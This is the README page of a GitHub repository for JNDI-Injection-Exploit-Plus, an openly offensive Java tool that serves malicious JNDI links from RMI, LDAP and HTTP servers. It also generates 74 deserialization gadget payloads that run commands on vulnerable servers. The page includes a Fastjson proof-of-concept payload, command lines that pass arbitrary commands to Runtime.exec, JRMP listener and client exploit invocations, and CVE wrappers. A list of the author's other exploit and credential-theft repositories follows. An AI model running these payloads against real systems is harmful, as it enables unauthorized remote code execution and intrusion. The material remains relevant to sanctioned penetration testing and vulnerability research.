• Stars
    star
    706
  • Rank 64,138 (Top 2 %)
  • Language
    Java
  • License
    MIT License
  • Created over 2 years ago
  • Updated 5 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

80+ Gadgets(30 More than ysoserial). JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server.

JNDI-Injection-Exploit-Plus

中文 README

Description

JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server.

Using this tool allows you get JNDI links, you can insert these links into your POC to test vulnerability.

For example, this is a Fastjson vul-poc:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}

We can replace "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit-Plus to test vulnerability.

What's more, you can also use JNDI-Injection-Exploit-Plus to generate base64/hex type of payloads like ysoserial

More than JNDI-Injection-Exploit

JNDI-Injection-Exploit is a great tool, this is the plus version of it.

What's more

1. More JNDI Remote Reference Gadget: (total: 3)

  • Support JDK 6/7/8

2. More JNDI Local Reference Gadget: (total: 4)

Payload author dependencies
Tomcat 8+ or SpringBoot @welk1n trustURLCodebase is false but have Tomcat 8+ or SpringBoot 1.2.x+ in classpath
Groovy (GroovyClassLoader) @cckuailong trustURLCodebase is false but have Tomcat and Groovy in classpath
Groovy (GroovyShell) @cckuailong trustURLCodebase is false but have Tomcat and Groovy in classpath
Websphere Readfile @cckuailong trustURLCodebase is false but have WebSphere v6-v9 in classpath

3. Deserailization Gadget (total: 74)

P.S. More Gadgets (⬆️ ) than ysoserial, welcome to PR more! ^_^

payload author dependencies
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
C3P0Tomcat @yulegeyu tomcat, com.mchange:c3p0:0.9.5.2, com.mchange:mchange-commons-java:0.2.11
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
Clojure @JackOfMostTrades clojure:1.8.0
Coherence1 ⬆️ @cckuailong coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence2 ⬆️ @cckuailong coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence3 ⬆️ @cckuailong coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
Coherence4 ⬆️ @cckuailong coherence:3.7.1.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Coherence5 ⬆️ @cckuailong coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
Coherence6 ⬆️ @cckuailong coherence:12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2
CommonsBeanutils2 ⬆️ @cckuailong commons-beanutils:1.9.2
CommonsCollections1 @frohoff commons-collections:3.1
CommonsCollections1_1 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections2 @frohoff commons-collections4:4.0
CommonsCollections2_1 ⬆️ @cckuailong commons-collections4:4.0
CommonsCollections3 @frohoff commons-collections:3.1
CommonsCollections3_1 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections4 @frohoff commons-collections4:4.0
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
CommonsCollections5_1 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections6 @matthias_kaiser commons-collections:3.1
CommonsCollections6_1 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections6_2 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections6_3 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
CommonsCollections7_1 ⬆️ @cckuailong commons-collections:3.1
CommonsCollections8 ⬆️ @cckuailong commons-collections4:4.0
CommonsCollections9 ⬆️ @cckuailong commons-collections:3.2.1
CommonsCollections10 ⬆️ @cckuailong commons-collections:3.2.1
CommonsCollections11 ⬆️ @cckuailong commons-collections:3.1
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
Groovy1 @frohoff groovy:2.3.9
Hibernate1 @mbechler
Hibernate2 @mbechler
Jackson ⬆️ @y4er com.fasterxml.jackson.core:jackson-databind:2.14.2
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jdk7u21 @frohoff
JRMPClient1 @mbechler
JRMPClient2 ⬆️ @cckuailong
JRMPClient3 ⬆️ @cckuailong
JRMPClient4 ⬆️ @cckuailong
JRMPClient5 ⬆️ @cckuailong
JRMPClient6 ⬆️ @cckuailong
JRMPListener1 @cckuailong
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
MozillaRhino1 @matthias_kaiser js:1.7R2
MozillaRhino2 @_tint0 js:1.7R2
Myfaces1 @mbechler
Myfaces2 @mbechler
ROME1 @mbechler rome:1.0
ROME2 ⬆️ @firebasky rome:1.0
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
Spring3 ⬆️ @cckuailong spring-tx:5.2.3.RELEASE, spring-context:5.2.3.RELEASE, javax.transaction-api:1.2
URLDNS @gebl jre only vuln detect
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
Weblogic1 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
Weblogic2 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.0
Weblogic3 ⬆️ @cckuailong com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager
Weblogic4 ⬆️ @cckuailong weblogic.common.internal.WLObjectOutputStream
Weblogic5 ⬆️ @cckuailong weblogic:12.2.1.4, coherence
Weblogic6 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
Weblogic7 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
Weblogic8 ⬆️ @cckuailong weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic9 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic10 ⬆️ @cckuailong weblogic:10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Weblogic11 ⬆️ @cckuailong weblogic:12.2.1.3, 12.2.1.4, 14.1.1.0
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
WildFly1 ⬆️ @hugow org.wildfly:wildfly-connector:26.0.1.Final

4. generate and export payloads

Like ysoserial.

You can generate the deserialization payloads with Base64 or HEX type of output

5. Wrapper

Some Wrappers to wrap Deserial Data.

Wrapper Example Vuls
Xstream CVE-2021-39149
Apereo Apereo 4.1 Deserialization RCE
JbossRemoting Jboss Remoting Port Unserialization
  • Example
$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream

Web service to return Deserial Gadgets

java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar
POST /deserial/{Gadget}

cmd={command}&wrapper={wrapper}output={base64/hex}

P.S. Param wrapper & output is opetional

Usage

JNDI Links

Run as

$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]

where:

  • -C - command executed in the remote classfile.

    (optional , default command is "open /Applications/Calculator.app")

  • -A - the address of your server, maybe an IP address or a domain.

    (optional , default address is the first network interface address)

Points for attention:

  • make sure your server's ports (1099, 1389, 8180) are available .

    or you can change the default port in the run.ServerStart class.

  • your command is passed to Runtime.getRuntime().exec() as parameters,

    so you need to ensure your command is workable in method exec().

    Command in bash like "bash -c ...." need to add Double quotes.

Deserialization Payloads

Run as

$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]

where:

  • -C - command executed in the remote classfile.

    (optional , default command is "open /Applications/Calculator.app")

  • -D - The deserial Gadget payload name.

  • -O - (Optional) The deserial output type, default is base64

Deserialization Exploits

JRMP

  • JRMPListener
java -cp JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
  • JRMPClient
java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64

Examples

JNDI Links

Local demo:

  1. Start the tool like this:

    $ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"

    Screenshot:

  2. Assume that we inject the JNDI links like rmi://ADDRESS/remoteExploit8 generated in step 1 to a vulnerable application which can be attacked by JNDI injection.

    In this example, it looks like this:

    class Test{
        public static void main(String[] args) throws Exception{
            InitialContext ctx = new InitialContext();
            ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
        }
    }

    then when we run this code, the command will be executed ,

    and the log will be printed in shell:

For More Examples: Test-JNDI-Injection-Exploit-Plus

Deserialization Payloads

$ java -jar JNDI-Injection-Exploit-Plus-2.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64

Base64 Output Result:

Installation

We can select one of the two methods to get the jar.

  1. Download the latest jar from Realease.

  2. Clone the source code to local and build (Requires Java 1.8+ and Maven 3.x+).

    $ git clone https://github.com/cckuailong/JNDI-Injection-Exploit-Plus.git
    $ cd JNDI-Injection-Exploit-Plus
    $ mvn clean package -DskipTests

P.S. ‼️ If you get the error like "java.rmi.xxx does not exists", you should set the JAVA_HOME env.

Disclaimer

All information and code is provided solely for educational purposes and/or testing your own systems for these vulnerabilities.

More Repositories

1

vulbase

各大漏洞文库合集
HTML
735
star
2

reapoc

OpenSource Poc && Vulnerable-Target Storage Box.
PHP
677
star
3

hostscan

自动化Host碰撞工具,帮助红队快速扩展网络边界,获取更多目标点
Go
539
star
4

awesome-gpt-security

A curated list of awesome security tools, experimental case or other interesting things with LLM or GPT.
514
star
5

py2sec

🐍 py2sec is a Cross-Platform, Fast and Flexible tool to change the .py to .so(Linux and Mac) or .pyd(Win).
Python
488
star
6

HackChrome

⛄ Get the User:Password from Chrome(include version < 80 and version > 80)
Go
333
star
7

SuperAdapters

Finetune ALL LLMs with ALL Adapeters on ALL Platforms!
Python
286
star
8

pocsploit

a lightweight, flexible and novel open source poc verification framework
Python
234
star
9

py2so

🐍 py2so is tool to change the .py to .so, you can use it to hide the source code of py [Deprecated]. Please navigate to Py2sec
Python
140
star
10

spring-cloud-function-SpEL-RCE

spring-cloud-function SpEL RCE, Vultarget & Poc
Java
133
star
11

YarnRpcRCE

79
star
12

colorsys-go

🎃 colorsys-go is a go package(or lib) for everyone to transform one color system to another. The transformation is among RGB, YIQ, HLS and HSV.
Go
78
star
13

InformationGather

SRC Assets Information Gather Website(SRC资产信息聚合网站)
Vue
61
star
14

netuser

Add or Delete User via windows api,it can be used when .net is inaccessible.
C++
38
star
15

MosaicImage

自动获取用户指定类别图片,并制作马赛克图片
Go
31
star
16

CVE-2022-40146_Exploit_Jar

Java
31
star
17

PocCollect

Poc Collected for study and develop
HTML
30
star
18

ICS-Protocal-Detect-Nmap-Script

Some nmap scripts to detetct the infomations of the different ICS Here are 16 main ics protocal scan-scripts include Modbus, S7 and so on.
Lua
29
star
19

Shyvana

A full vul scanner which contains many aspects (adding)
Go
28
star
20

gitAutoStar

配合GitStar编写的自动Star工具,稳定快速,跨平台
Go
21
star
21

log4shell_1.x

log4j 1.x RCE Poc -- CVE-2021-4104
Java
20
star
22

Log4j_CVE-2021-45046

Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046
Java
20
star
23

simHtml

Compare html similarity using structural and style metrics
Go
19
star
24

Log4j_dos_CVE-2021-45105

Log4j_dos_CVE-2021-45105
Java
13
star
25

nginx_vultarget

Python
13
star
26

gitAutoStar-py

最新版gitStar自动点赞,使用selenium
Python
11
star
27

HaveIReg

HaveIReg用于查找出特定用户在哪些网站注册过
Python
8
star
28

Interview

面试题整理分享(持续更新ing)
Batchfile
8
star
29

cckuailong.github.io

Writing 1000 Words a Day Changed My Life
HTML
7
star
30

Small_Functions

Some interesting code fragments to please
HTML
6
star
31

awesome-ml-for-cybersecurity-books

PDF books for awesome-ml-for-cybersecurity-books
6
star
32

CS-Fun-500-Questions

计算机科学中有趣的500问
Batchfile
5
star
33

DgaDetect

Use Keras or TFLearn to detetct DGA via LSTM, AMSGrad and NAdam
Python
5
star
34

log4j_RCE_CVE-2021-44832

Java
4
star
35

BGPStream_Operate_Plugin

I write two shell scripts to help people create or delete the bgpcorsaro's plugin with only one shell command.
C
4
star
36

KerGaNs

Various GANs with Keras (With diginmon generator as example)
Python
4
star
37

WebsiteApp

We provide a tiny Anddroid App which collects many website for whoerver wants to get the main information of news in a short time
Java
4
star
38

CVE-2021-2471

Java
3
star
39

Learning

好文章收集整理
3
star
40

Colorsys.jl

🌈 Colorsys.jl is a Julia package(or lib) for everyone to transform one color system to another. The transformation is among RGB, YIQ, HLS and HSV.
Julia
3
star
41

vultarget_web

Python
3
star
42

pget

pget is a go package for people to add parallel download func into there project. (Adapt from the go download client [https://github.com/Code-Hex/pget])
Go
3
star
43

clonehub

clone all images(with all tags) on dockerhub to your own dockerhub repo
Shell
2
star
44

Test-JNDI-Injection-Exploit-Plus

Examples for JNDI-Injection-Exploit-Plus
Java
2
star
45

DLMovies

提供查询下载电影的网站,爬取各大电影网站
Go
2
star
46

apereo-cas-docker

apereo cas docker-compose (can customize cas version)
Dockerfile
2
star
47

Dga.jl

Dga.jl can make you customize one or many DGAs. The included DGAs are [Banjori,Corebot,Cryptolocker,Dircrypt,Kraken,Lockyv2,Pykspa,Qakbot Ramdo,Ramnit,Simda]
Julia
2
star
48

Spark-Scala-Handle

Scala
1
star
49

Leetcode-go

Leetcode write in Golang.
Go
1
star
50

gunicorn_request_smuggling

gunicorn 20.0.4 request smuggling
Python
1
star
51

Spiders

随便写的爬虫
Python
1
star
52

Paper_torrent

Academic papers to download, the data is more than 10 TB
1
star